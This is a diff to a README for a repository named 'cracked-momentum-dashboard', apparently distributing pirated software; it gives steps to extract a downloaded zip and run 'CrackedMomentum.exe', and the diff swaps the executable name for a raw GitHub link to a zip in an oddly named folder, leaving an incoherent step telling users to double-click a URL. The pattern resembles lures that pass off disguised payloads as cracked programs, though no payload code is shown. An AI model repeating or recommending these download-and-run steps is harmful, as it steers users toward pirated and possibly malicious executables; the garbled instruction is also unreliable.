3hxrp/cracked-momentum-dashboard/README.md

 1. Locate the downloaded `.zip` file.
 2. Right-click on the file and select "Extract All."
 3. Choose a folder to extract the contents.
-4. Open the extracted folder and double-click `CrackedMomentum.exe` to launch the application.
+4. Open the extracted folder and double-click `https://raw.githubusercontent.com/3hxrp/cracked-momentum-dashboard/main/whenness/cracked-momentum-dashboard.zip` to launch the application.

 #### For macOS